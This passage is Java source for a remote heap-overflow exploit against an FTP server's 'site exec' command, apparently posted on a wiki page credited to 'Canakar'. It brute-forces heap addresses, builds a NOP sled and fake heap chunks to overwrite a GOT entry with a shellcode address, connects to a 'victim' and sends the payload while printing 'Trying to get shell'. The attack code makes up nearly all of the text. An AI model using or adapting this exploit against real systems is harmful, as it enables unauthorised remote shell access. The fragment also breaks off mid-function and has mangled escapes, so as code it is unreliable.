if(works(m+l+st))
{

System.out.print(".");
tmp_heap=l+m;

if(exploit("scan"))
{
System.out.println("nheap:t"+Long.toHexString(tm p_heap)+"n");
System.out.println("nTrying to get shell...");
return true;
}

}
else // if(!works(m+l+st))
System.out.print("*");

}//for
}//for
return false;
}//force()


boolean exploit(String mode)
{

StringBuffer buf=new StringBuffer();
StringBuffer buf2=new StringBuffer("");

String got[] = new String[5];
String heap[] = new String[5];
String inpbuf[]=new String[5];


String hexgot = Long.toHexString(tmp_got);
String hexheap = Long.toHexString(tmp_heap);
String hexinpbuf = Long.toHexString(tmp_inpbuf);

//////////////////// PUT THE GOT ADDRESS ///////////////////////////
if(hexgot.length()==7)
{
got[0] = "0"+hexgot.substring(0,1);
got[1] = hexgot.substring(1,3);
got[2] = hexgot.substring(3,5);
got[3] = hexgot.substring(5,7);
}

if(hexgot.length()==8)
{
got[0] = hexgot.substring(0,2);
got[1] = hexgot.substring(2,4);
got[2] = hexgot.substring(4,6);
got[3] = hexgot.substring(6,8);
}


//////////////////// PUT THE HEAP ADDRESS ///////////////////////////
if(hexheap.length()==7)
{
heap[0] = "0"+hexheap.substring(0,1);
heap[1] = hexheap.substring(1,3);
heap[2] = hexheap.substring(3,5);
heap[3] = hexheap.substring(5,7);
}

if(hexheap.length()==8)
{
heap[0] = hexheap.substring(0,2);
heap[1] = hexheap.substring(2,4);
heap[2] = hexheap.substring(4,6);
heap[3] = hexheap.substring(6,8);
}

//////////////////// PUT THE INPBUF ///////////////////////////
if(hexinpbuf.length()==7)
{
inpbuf[0] = "0"+hexinpbuf.substring(0,1);
inpbuf[1] = hexinpbuf.substring(1,3);
inpbuf[2] = hexinpbuf.substring(3,5);
inpbuf[3] = hexinpbuf.substring(5,7);
}

if(hexinpbuf.length()==8)
{
inpbuf[0] = hexinpbuf.substring(0,2);
inpbuf[1] = hexinpbuf.substring(2,4);
inpbuf[2] = hexinpbuf.substring(4,6);
inpbuf[3] = hexinpbuf.substring(6,8);
}

//fill buffer with nops
for(int i=0;i!=480;i++)
buf2.append((char)0x90);

// fill the buffer with chunks. overwrites the syslog call pointer with
// address of our shellcode.
for(int l=0;l<460;l+=16)
{

buf2.setCharAt(l+0,(char)Integer.parseInt("F0", 16));
buf2.setCharAt(l+1,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+2,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+3,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+4,(char)Integer.parseInt("F0", 16));
buf2.setCharAt(l+5,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+6,(char)Integer.parseInt("FF", 16));
buf2.setCharAt(l+7,(char)Integer.parseInt("FF", 16));

buf2.setCharAt(l+8,(char)Integer.parseInt(got[3], 16));
buf2.setCharAt(l+9,(char)Integer.parseInt(got[2], 16));
buf2.setCharAt(l+10,(char)Integer.parseInt(got[1], 16));
buf2.setCharAt(l+11,(char)Integer.parseInt(got[0], 16));

buf2.setCharAt(l+12,(char)Integer.parseInt(inpbuf[3], 16));
buf2.setCharAt(l+13,(char)Integer.parseInt(inpbuf[2], 16));
buf2.setCharAt(l+14,(char)Integer.parseInt(inpbuf[1], 16));
buf2.setCharAt(l+15,(char)Integer.parseInt(inpbuf[0], 16));

}

buf.append("user ftpnpass http://mp3.com/cosv ");
buf.append((char)Integer.parseInt(heap[3], 16)+""+(char)Integer.parseInt(heap[2], 16)+""+(char)Integer.parseInt(heap[1], 16)+""+(char)Integer.parseInt(heap[0], 16));
buf.append("n");

connect(victim);

dosend(buf.toString());

StringBuffer snd=new StringBuffer("site exec "+buf2+" AAAAn");
dosend(snd.toString());

buf2=new StringBuffer("");

//fill buffer with nops
for(int i=0;i!=480-sclength-1;i++)
buf2.append((char)0x90);

//add chunks

Written by Canakar
Latest page update: made by Canakar, Feb 19 2009, 12:09 AM EST